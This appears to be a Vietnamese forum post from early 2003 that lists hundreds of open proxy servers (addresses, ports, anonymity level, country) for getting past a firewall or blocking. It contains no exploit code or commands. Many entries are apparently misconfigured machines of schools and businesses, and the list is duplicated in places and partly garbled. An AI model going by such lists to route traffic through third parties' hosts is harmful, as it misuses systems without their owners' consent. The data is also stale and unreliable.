Nếu dùng hết mấy cái proxy ở trên mà vẫn không trèo vào được (bạn quả là người giàu có và kiên trì ), thì bạn thử tiếp mấy cái này nhé :

212.242.48.148 80 Anonymous Denmark Mon Jan 27 2003 - 0:06:27
218.145.25.108 8081 High anonymity Korea, Republic Of Sun Jan 26 2003 - 16:38:31
200.33.141.222 3128 High anonymity Mexico Sun Jan 26 2003 - 16:35:30
216.248.146.51 80 Anonymous United States Sun Jan 26 2003 - 15:30:14
4.33.21.74 80 Anonymous United States Sun Jan 26 2003 - 15:26:57
isdn02201.cultura.com.br 80 High anonymity Brazil Sun Jan 26 2003 - 14:50:39
194.muja.pitt.washdctt.dsl.att.net 80 Anonymous United States Sun Jan 26 2003 - 14:47:48
216.93.126.55 8080 High anonymity United States Sun Jan 26 2003 - 13:39:33
200.171.25.187 8080 High anonymity Brazil Sun Jan 26 2003 - 13:38:08
202.9.136.40 8080 Anonymous India Sun Jan 26 2003 - 10:26:13
66.13.59.195 80 High anonymity United States Sun Jan 26 2003 - 5:18:48
proxy.itbnet.de 3128 Anonymous Germany Sun Jan 26 2003 - 5:04:45
202.54.13.146 80 High anonymity India Sun Jan 26 2003 - 5:04:29
202.156.2.50 8080 High anonymity Singapore Sun Jan 26 2003 - 5:04:22
213.25.171.33 80 High anonymity Poland Sun Jan 26 2003 - 5:04:01
62.81.235.6 80 High anonymity Spain Sun Jan 26 2003 - 5:03:05
62.20.2.35 80 Anonymous Sweden Sun Jan 26 2003 - 4:52:56
213.4.108.197 80 High anonymity Spain Sun Jan 26 2003 - 4:34:27
213.38.21.78 8080 Anonymous England Sun Jan 26 2003 - 3:59:20
virtual.v3.chollian.net 80 High anonymity Korea, Republic Of Sun Jan 26 2003 - 3:36:20
62.48.68.46 80 High anonymity Germany Sun Jan 26 2003 - 3:21:08
creative-capital.org 80 High anonymity United States Sun Jan 26 2003 - 2:01:45
cflow-ap-195.socal.rr.com 80 High anonymity United States Sun Jan 26 2003 - 2:00:35
66.172.1.182 80 High anonymity United States Sun Jan 26 2003 - 1:58:31
63.143.108.68 80 High anonymity United States Sun Jan 26 2003 - 1:57:54
200.194.232.4 8080 High anonymity Brazil Sun Jan 26 2003 - 1:15:01
208.187.125.6 8080 High anonymity United States Sun Jan 26 2003 - 1:12:51
proxy.cedunet.com 8080 Transparent Finland Sat Jan 25 2003 - 23:29:45
kisnsvr.e-showcase.com.sg 8080 High anonymity Singapore Sat Jan 25 2003 - 22:23:55
200.190.39.82 80 Anonymous Brazil Sat Jan 25 2003 - 21:56:16
203.108.113.194 80 Anonymous Australia Sat Jan 25 2003 - 20:10:25
200.85.45.206 80 Transparent Paraguay Sat Jan 25 2003 - 18:45:12
61.131.48.219 80 Anonymous China Sat Jan 25 2003 - 18:44:28
211.233.27.189 80 Anonymous Korea, Republic Of Sat Jan 25 2003 - 18:44:06
web.shc.ac.th 80 Anonymous Thailand Sat Jan 25 2003 - 18:42:43
217.156.79.193 80 High anonymity Romania Sat Jan 25 2003 - 18:35:49
195.167.65.222 80 High anonymity Greece Sat Jan 25 2003 - 18:34:02
212.98.229.24 80 High anonymity Turkey Sat Jan 25 2003 - 18:19:28
203.235.116.144 80 High anonymity Korea, Republic Of Sat Jan 25 2003 - 18:18:01
61.221.123.236 80 High anonymity Taiwan, Province Of China Sat Jan 25 2003 - 18:17:22
by-tor.2112.net:3218
211.252.237.38:3128
217.8.33.66:3218
bpubl007.hgo.se:3128
200-207-119-143.dsl.telesp.net.br:3128
200-207-128-165.dsl.telesp.net.br:3128
aworklan003105.netvigator.com:3128
210.21.93.141:3128
211.141.154.93:3128
212-170-23-125.uc.nombres.ttd.es:3128
212.49.87.254:3128
217-127-248-37.uc.nombres.ttd.es:3128
217.218.15.133:3128
218.21.77.218:3128
218.21.77.54:3128
218.5.135.228:3128
218.5.148.165:3128
218.5.185.239:3128
61.150.94.139:3128
62.153.147.198:3128
62.3.45.196:3128
211.20.195.43:3128
bpubl007.hgo.se:3128
200-207-119-143.dsl.telesp.net.br:3128
200-207-128-165.dsl.telesp.net.br:3128
aworklan003105.netvigator.com:3128 212-170-23-125.uc.nombres.ttd.es:3128
211.141.154.93:3128
217-127-248-37.uc.nombres.ttd.es:3128
210.21.93.141:3128
217.218.15.133:3128
218.21.77.218:3128
218.21.77.54:3128
218.5.135.228:3128
218.5.148.165:3128
218.5.185.239:3128
61.150.94.139:3128
62.153.147.198:3128
62.3.45.196:3128
line132-177.adsl.actcom.co.il:6588
mail.theweb.co.uk:8888
uu194-7-54-90.unknown.uunet.be:81
211.114.194.58:8081
203.115.234.98:8494
saturn.littleb.com:8888
210.145.17.38:8180
210.145.17.38:8280
211.20.195.43:3128 211.100.0.34:8088
212.68.202.81
138.81.11.3
144.92.104.66
210.99.199.227
ws13.lumedia.fi:80
218.65.110.14:80
218.145.25.47:80
211.233.80.64:80
211.233.80.22:80
211.233.27.189:80
203.113.34.239:80
24.41.27.57
170.224.224.37
217.172.180.178
210.146.44.245
63.100.18.2:80
63.193.207.2:80
nfdh.org:80
ftp.aparizona.com:80
tmc01.tmcgroup.com:80
124.125.252.64.snet.net:80
dns.urkraft.se:80
ns.dainichi-el.co.jp:80
206.105.71.2:80
216.235.32.126:80
ns.cyberlinks-jp.com:80
210.163.167.162:80
64.5.220.82:80
204.196.104.27:80
211.20.195.43:80
internet-server.ebf.com.br:80
211.100.0.34:80
61.142.169.98:80
163.29.140.66:80
ns.proserv.co.jp:80
207.225.63.2:80
sv1.ura.co.jp:80
www.jps-print.com:80
www.nisshin-syouji.co.jp:80
ns.itac-ao.co.jp:80
210.255.65.2:80
gauntlet1.huntlas.co.za:80
srv-2tee-lamias.fth.sch.gr:80
210.175.125.34:80
www.qdh.or.jp:80
mail1.found.co.jp:80
sdsl-64-7-12-211.dsl.chi.megapath.net:80
ns.tew-j.com:80
211.20.154.178:80
pbc.edu.gd:80
210.74.254.35:80
210.176.230.29:80
202.39.21.122:80
ns.factornet.co.jp:80
212.150.12.21:80
212.150.215.4:80
212.154.175.227:80
212.155.109.161:80
TK212017066196.teleweb.at:80
chello212017083078.11.vie.surfer.at:80
mail.buehlermotor.com.mx:80
212.187.53.133:80
www.davidblowers.co.uk:80
wireless-067-159.tele2.co.uk:80
wireless-069-070.tele2.co.uk:80
212.204.48.210:80
mail.arena-it.co.uk:80
mail.bss-ltd.com:80
212.251.36.62:80
212.252.105.35:80
212.27.114.1:80
212.31.98.18:80
212.42.166.98:80
ath-s2.athen.goethe.org:80
is2.isys.no:8000
212.80.166.163:80
213.11.85.249:80
213.121.248.138:80
213.121.248.147:80
213.121.248.90:80
213.121.248.96:80
eblock-202.adsl.newnet.co.uk:80
213.136.147.254:80
213.16.133.130:80
witloxproxy.knoware.nl:80
213.176.28.6:80
213.227.69.247:80
213.25.170.194:80
213.25.29.12:80
object.wackenhut.gr:80
213.56.134.17:80
sub-166ip130.carats.net:80
adsl-216-158-25-110.cust.oldcity.dca.net:80
216-180-160-009.fsi.net:80
normandintransit.com:80
216-238-112-40.dsl.ct.thebiz.net:80
host-216-252-226-
216.72.127.238:80
216.72.196.21:80
www.cotecna.com.co:80
216.72.63.198:80
217.129.0.210:80
cobalt3.cotel.de:80
host217-34-194-49.in-addr.btopenworld.com:80
host162-14.pool21756.interbusiness.it:80
ns.tachyon.co.jp:80
2.magicbird.co.jp:80
htinet-svr.hontsubo.co.jp:80
static172-4-151-24.nt01-c3.cpe.charter-ne.com:80
cpe-24-221-170-209.ca.sprintbbd.net:80
61.11.26.150:80
dns1.koibuchi.ac.jp:80
mail.koibuchi.ac.jp:80
rmc01.rmcsocio.ne.jp:80
61.131.0.172:80
61.131.0.226:80
61.131.48.219:80
61.133.63.129:80
61.136.16.228:80
61.142.15.163:80
61.163.229.38:80
61.74.65.97:80
61.74.65.98:80
62.153.108.66:80
62.159.70.194:80
proxy.sca.cnrs.fr:80
proxy.airspan.com:80
62.3.45.196:80
164.58.28.250:80
web.khi.is:80
ask.imv.au.dk:80
westbu.lnk.telstra.net:80
server.clarktoyota.com:80
ns2.rpa.ca:80
customer-148-223-48-114.uninet.net.mx:80
dhcp-130.fegs.org.ve:80
ucv10.ucv.cl:80
164.58.18.25:80
166.114.127.6:80
166.114.173.3:80
168.243.149.225:80
ns1.nissinhkltd.com.hk:80
193.128.109.54:80
www.bhakleibnitz.asn-graz.ac.at:80
193.188.101.146:80
193.194.168.15:80
193.220.32.246:80
libsrv.peto.hu:80
193.227.168.211:80
AStrasbourg-201-2-1-26.abo.wanadoo.fr:80
193.68.37.245:80
nw155-226.indigo.ie:80
gennet.gennet.ee:80
194.219.153.210:80
194.228.105.146:80
c2fa963f.adsl.oleane.fr:80
194.6.1.219:80
srv-6gym-kalam.mes.sch.gr:80
srv-1sek1-kalam.mes.sch.gr:80
194.65.77.1:80
194.79.97.69:80
195.126.227.35:80
195.130.88.40:80
pools1-31.adsl.nordnet.fr:80
pools1-98.adsl.nordnet.fr:80
195.167.64.193:80
knowledge.esaars.dk:80
server.elelm-nyh.sulinet.hu:80
server.sztmargitgimi.sulinet.hu:80
los.micros.com.pl:80
server3.telekom.hr:80
195.47.14.193:80
195.53.242.35:80
196.23.147.34:80
196.25.123.145:80
slip53.new.co.za:80
196.40.43.34:80
199.222.69.150:80
199.250.215.146:80
musalemnt.notariamusalem.cl:80
200.135.246.2:80
200.164.56.24:80
200-168-4-236.dsl.telesp.net.br:80
internetdigital.grupogazeta.com.br:80
200.190.117.115:80
200.194.97.10:80
200.195.52.193:80
200.202.227.1:80
200-204-148-171.dsl.telesp.net.br:80
200-204-182-137.dsl.telesp.net.br:80
200-204-75-246.dsl.telesp.net.br:80
200.211.98.5:80
as400web.cuatrocaminos.com.mx:80
cube.telinet.com.mx:80
isdn02201.cultura.com.br:80
isdn02204.cultura.com.br:80
200.24.214.132:80
isdn03021.cultura.com.br:80
200.248.115.130:80
adao.dei.unicap.br:80
200.252.154.207:80
200.252.154.216:80
200.27.152.3:80
200.28.88.194:80
mail.covial.gob.gt:80
ddbguate.com.gt:80
mail.care.org.gt:80
hosa.com.ec:80
gps02.greatplains.com.co:80
200.32.69.121:80
200-34-251-125.sophialabs.com:80
r200-40-206-134.adinet.com.uy:80
200.46.109.82:80
int-200-49-212-32.movi.com.ar:80
200.51.156.93:80
advance40-34.infovia.com.ar:80
200.52.4.82:80
correo.cfired.org.ar:80
host141086.metrored.net.ar:80
r200-61-110-62.multitel.net.uy:80
catriel-ar-host-196-1.customer.tiba.com:80
icafal-nt.icafal.cl:80
mail.bcero.cl:80
200.74.140.138:80
202.104.20.181:80
202.106.139.88:80
202.108.122.38:80
202.110.204.18:80
202.110.220.14:80
202.129.4.8:80
202.145.140.1:80
mail.jjs.or.id:80
chinfoh.com.my:80
202.186.33.157:80
zaitun.com.my:80
lisa.mir.com.my:80
202.28.68.18:80
c155.h202052079.is.net.tw:80
cair.res.in:80
202.56.136.210:80
202.66.101.210:80
mail.usclcargo.com.hk:80
202.93.253.33:80
202.97.161.206:80
203.107.229.2:80
bmihms-s.ozemail.com.au:80
203.113.34.239:80
203.116.111.196:80
203.151.40.4:80
203.155.172.60:80
203.155.206.161:80
203.155.9.158:80
waroona.wa.edu.au:80
203.162.12.106:80
203.162.6.45:80
203.179.49.74:8080
203186146161.ctinets.com:80
203.197.166.198:80
esjv.com.hk:80
ipvpn010013.netvigator.com:80
ipvpn034140.netvigator.com:80
203.199.147.126:80
203.200.75.165:80
203.234.17.49:80
203.235.26.1:80
203.236.83.129:80
203.241.151.50:80
zero.bora.net:80
cp.chollian.net:80
203.58.162.36:80
yuluma.wa.edu.au:80
203.69.244.194:80
203.93.218.65:80
204.101.186.234:80
205.250.90.2:80
fun1.clmb.edge.net:80
cfw.candw.lc:80
io.sunrem.com:80
wc-212.sintmaarten.net:80
www.antigua.com:80
Wall-1.Equinox-Group.com:80
207.219.100.35:80
207.236.59.162:80
207.236.70.2:80
207.246.105.209:80
mail.alexisnihon.com:80
207.61.253.50:80
vpr.lrplot.com:80
209.11.224.70:80
209.11.47.214:80
209.110.70.11:80
209.142.226.2:80
h209-17-147-1.gtconnect.net:80
209.180.208.4:80
209.182.73.114:80
209.31.157.2:80
209.31.157.33:80
lin-dsl-static-209-50-21-138.inetnebr.com:80
209.53.200.33:80
h209-71-201-65.gtconnect.net:80
cr2098859123.cable.net.co:80
mail.unibase.com.co:80
mail.unisol.com.ar:80
210.0.200.211:80
210.12.192.35:80
210.12.86.181:80
mh.sci-tennis.net:80
sv3.bunsei.ac.jp.144.40.145.210.in-addr.arpa:80
will.eyecatcher.co.jp:80
rainier.midx.com:80
ns.okumaseibido.co.jp:80
210.181.4.193:80
210.184.32.220:80
pc100.ocdi.or.jp:80
www.city.hekinan.aichi.jp:80
210.242.164.150:80
www.jcn.co.jp:80
210.52.46.29:80
smtp.greenharvest.co.nz:80
pxylhr.comsats.net.pk:80
210.66.193.222:80
210.8.133.185:80
210.94.255.160:80
210.97.78.253:80
ns.kagaku-k.co.jp:80
ns.21-zentsu.com:80
ns.reuse.or.jp:80
www.kan-shoku.co.jp:80
ns.toyoriko.co.jp:80
211.114.116.60:80
211.154.53.161:80
211.162.0.33:80
211.162.108.49:80
211.163.56.77:80
211.163.94.81:80
211.165.192.8:80
211.17.150.163:80
211.183.77.59:80
211.183.77.60:80
211.20.68.74:80
211.233.68.202:80
211.234.62.169:80
211.35.78.36:80
dns1.daiken-c.co.jp:80
dns.lpgc.or.jp:80
211.90.31.53:80
211.91.239.253:80
211.97.213.18:80
212.0.145.34:80
212.118.2.194:80
212.12.230.180:80
enteleca-2.dsl.easynet.co.uk:80
212.141.19.132:80
203.17.102.91:8080
66.7.97.33:8080
cache51.156ce.scvmaxonline.com.sg:8080
211.114.193.234:8080
dhcp-12-163-7-33.plantationcable.net:8080
ticonderogak12.org:8080
adsl-65-43-76-37.dsl.chcgil.ameritech.net:8080
rrcs-ma-24-56-79-117.biz.rr.com:8080
prrd.monarch.net:8080
ip116.gte8.rb1.bel.nwlink.com:8080
202.29.15.4:8080
210.117.67.218:8080
210.120.128.117:8080
210.117.67.214:8080
202.181.176.110:8080
yuba5.yuba.net:8080
210.117.67.218:8080
210.120.128.117:8080
210.117.67.214:8080
130.228.101.40:8080
203.17.102.91:8080
66.7.97.33:8080
203.235.116.158:80
203.17.102.91:8080
webmail.alami.net:8080
63.193.207.2:8080
dell.compleat.com:8080
80.196.228.136:8080
adsl-63-192-134-107.dsl.snfc21.pacbell.net:8080
210.145.17.38:8080
212.15.17.210:8080
212.31.116.98:8080
AS7000_1B.sfn.co.jp:8080
adsl-64-164-243-146.dsl.lsan03.pacbell.net:8080
fhm.fhm.fhg.de:8080
nt1public.mcnet.ch:8080
mail.1ainfo.ch:8080
202.39.225.81:8080
166.114.173.3:8080
168.216.25.172:8080
193.188.87.35:8080
193.188.95.146:8080
194.78.66.68:8080
212.80.166.163:8080
pandora.teimes.gr:8080
pc1.kronospan.com.cy:8080
211.20.195.43:8080
sthweb1.helanta.sh:8080
194.74.201.10:8080
194.74.201.31:8080
194.79.113.83:8080
195.103.8.10:8080
195.22.176.226:8080
195.59.64.130:8080
mail.voltex.co.za:8080
www.wopl.org:8080
mail.hwe.cl:8080
200.193.46.18:8080
200-204-180-92.dsl.telesp.net.br:8080
200.21.225.82:8080
200.24.214.154:8080
200.31.204.58:8080
200.44.114.22:8080
213.25.170.98:8080
210.90.3.43:8080
acode-u.org:8080
216.120.43.90:8080
xirus.com:8080
sub-166ip130.carats.net:8080
213.187.210.35:8080
silainiai.failanas.lt:8080
zg2.intereuropa.hr:8080
proxy.elekta.lt:8080
5.interpacket.net:8080
217.96.4.195:8080
host77-178.pool21759.interbusiness.it:8080
h00e02938bfa0.ne.client2.attbi.com:8080
ip-84-101-67-210.rev.dyxnet.com:8080
213.16.141.10:8080
216.72.63.198:8080
217.10.214.182:8080
61.129.72.219:8080
host217-34-153-161.in-addr.btopenworld.com:8080
proxy1.drugeleven.com:8080
tgw.actuate.co.jp:8080
proxy.cablenet.net.ar:8080
210.82.34.250:8080
217.153.114.66:8080
61.11.26.142:8080
61.138.130.229:8080
mail.gadormail.com.ar:8080
61.180.73.66:8080
host162-148.pool62110.interbusiness.it:8080
p1030- ipadfx01morioka.iwate.ocn.ne.jp:8080
61.32.11.130:8080
211.138.91.22:8080
211.104.16.96:8080
202.100.72.33:8080
202.104.189.20:8080
200.61.6.50:8080
200.32.75.90:8080
202.105.138.19:8080
202.129.27.8:8080
202.186.101.151:8080
202.187.229.8:8080
202.28.68.18:8080
202.64.21.83:8080
202.99.225.45:8080
www.flab.fr:8080
211.233.21.166:8080
211.233.68.202:8080
211.250.149.132:8080
211.35.145.4:8080
211.35.78.36:8080
211.39.13.3:8080
211-41-184-225.rev.krline.net:8080
211.45.21.165:8080
211.93.108.113:8080
proxy.sca.cnrs.fr:8080
62.176.44.226:8080
ce3-mel.netspace.net.au:8080
202.67.212.2:8080
203.117.67.122:8080
203.148.254.131:8080
211.183.77.60:8080
211.190.27.102:8080
211.20.74.250:8080
211.21.111.227:8080
proxy.nida.ac.th:8080
ipvpn099169.netvigator.com:8080
203.241.151.50:8080
dns2.eagletech.com.au:8000
203.94.243.1:8080
223-mail.internet.ve:8080
209.31.157.33:8080
209.53.200.33:8080
n124h001.academycanada.com:8080
mail.bravocorp.com:8080
206.191.104.66:8080
cfw.candw.lc:8080
courriel.collegesaintsacrement.qc.ca:8080
router.banksandholeyfield.com:8080
210.0.140.34:8080
210.0.199.183:8080
210.0.214.130:8080
namesn.wadakogyo.co.jp:8080
mx.megasoft.co.jp:8088
210.204.118.194:8080
209.31.157.2:8080
210.219.227.52:8080
130.228.101.40:8080
fhm.fhm.fhg.de:8080
166.114.173.3:8080
168.216.25.172:8080
193.188.87.35:8080
193.188.95.146:8080
pandora.teimes.gr:8080
pc1.kronospan.com.cy:8080
sthweb1.helanta.sh:8080
194.74.201.10:8080
194.74.201.31:8080
194.79.113.83:8080
195.103.8.10:8080
sun.s.surfinn.com:8080
195.22.176.226:8080
195.59.64.130:8080
mail.voltex.co.za:8080
n124h001.academycanada.com:8080
www.wopl.org:8080
mail.hwe.cl:8080
200.193.46.18:8080
200-204-180-92.dsl.telesp.net.br:8080
200.21.225.82:8080
200.24.214.154:8080
200.31.204.58:8080
200.32.75.90:8080
200.44.114.22:8080
proxy.cablenet.net.ar:8080
mail.gadormail.com.ar:8080
200.61.6.50:8080
202.100.72.33:8080
202.104.189.20:8080
202.105.138.19:8080
202.129.27.8:8080
202.186.101.151:8080
202.187.229.8:8080
202.28.68.18:8080
202.64.21.83:8080
202.67.212.2:8080
202.99.225.45:8080
ce3-mel.netspace.net.au:8080
203.117.67.122:8080
203.148.254.131:8080
proxy.nida.ac.th:8080
203.179.49.74:8080
ipvpn099169.netvigator.com:8080
203.241.151.50:8080
203.94.243.1:8080
223-mail.internet.ve:8080
mail.bravocorp.com:8080
206.191.104.66:8080
cfw.candw.lc:8080
courriel.collegesaintsacrement.qc.ca:8080
router.banksandholeyfield.com:8080
209.31.157.2:8080
209.31.157.33:8080
209.53.200.33:8080
210.0.140.34:8080
210.0.199.183:8080
210.0.214.130:8080
namesn.wadakogyo.co.jp:8080
210.204.118.194:8080
210.219.227.52:8080
ip-84-101-67-210.rev.dyxnet.com:8080
210.82.34.250:8080
211.104.16.96:8080
211.138.91.22:8080
211.183.77.60:8080
211.190.27.102:8080
211.20.74.250:8080
211.21.111.227:8080
211.233.21.166:8080
211.233.68.202:8080
211.250.149.132:8080
211.35.145.4:8080
211.35.78.36:8080
211.39.13.3:8080
211-41-184-225.rev.krline.net:8080
211.45.21.165:8080
211.93.108.113:8080
webmail.alami.net:8080
212.15.17.210:8080
212.31.116.98:8080
212.80.166.163:8080
213.16.141.10:8080
acode-u.org:8080
213.187.210.35:8080
silainiai.failanas.lt:8080
zg2.intereuropa.hr:8080
proxy.elekta.lt:8080
213.25.170.98:8080
213.25.43.242:8080
216.120.43.90:8080
xirus.com:8080
sub-166ip130.carats.net:8080
host-216-252-226-5.interpacket.net:8080
216.72.63.198:8080
217.10.214.182:8080
217.153.114.66:8080
host217-34-153-161.in-addr.btopenworld.com:8080
host77-178.pool21759.interbusiness.it:8080
217.96.4.195:8080
h00e02938bfa0.ne.client2.attbi.com:8080
61.11.26.142:8080
proxy1.drugeleven.com:8080
tgw.actuate.co.jp:8080
61.129.72.219:8080
61.138.130.229:8080
61.180.73.66:8080
p1030-ipadfx01morioka.iwate.ocn.ne.jp:8080
61.32.11.130:8080
host162-148.pool62110.interbusiness.it:8080
sun.aa.surfinn.com:8080
www.flab.fr:8080
proxy.sca.cnrs.fr:8080
62.176.44.226:8080
adsl-63-192-134-107.dsl.snfc21.pacbell.net:8080
63.193.207.2:8080
adsl-64-164-243-146.dsl.lsan03.pacbell.net:8080
dell.compleat.com:8080
80.196.228.136:8080
AS7000_1B.sfn.co.jp:8080
210.145.17.38:8080
nt1public.mcnet.ch:8080
mail.1ainfo.ch:8080
202.39.225.81:8080
203.166.96.231:8080
211.20.195.43:8080
194.78.66.68:8080
210.90.3.43:8080
proxy.gsf.de:8000
193.15.252.80:8000
193.217.66.7:8000
193.29.2.13:8000
64-132-153-94.gen.twtelecom.net:8000
216.101.117.161:8000 www2.soas.ac.uk:8000
194.192.99.2:8000
211.15.62.123:8000
mail.theweb.co.uk:8000
griffin-mc.com:8000
195.162.160.5:8000
195.178.164.205:8000
195.97.138.212:8000
mail.millennium.co.za:8000
lvsweb.lasvegasstock.com:8000
host071052.arnet.net.ar:8000
commerce.visionsinc.com:8000
www.artcars.com:8000
www.thestudy.qc.ca:8000
poste242.multi-media.ca:8000
193.15.176.34:8000
ftp.orange.uk.com:8000
210.254.8.52:8000
207.61.38.67:8000
209.7.88.130:8000
h-209-91-87-163.gen.cadvision.com:8000
www.hida11pm-unet.ocn.ne.jp:8000
209.23.81.59:8000
mas-hamilton.com:80
209.47.38.116:8000
211.104.16.96:8000
www.dj8000.com:8000
212.12.157.130:8000
212.141.41.42:8000
host182-44.pool21758.interbusiness.it:8000
mail.globallink.de:8000
........
Nếu vẫn chưa leo được qua tường thì tạm dừng tay ! tắt máy lên giường đi ngủ dưỡng sức, tỉnh dậy leo tiếp... bằng 2 link sau: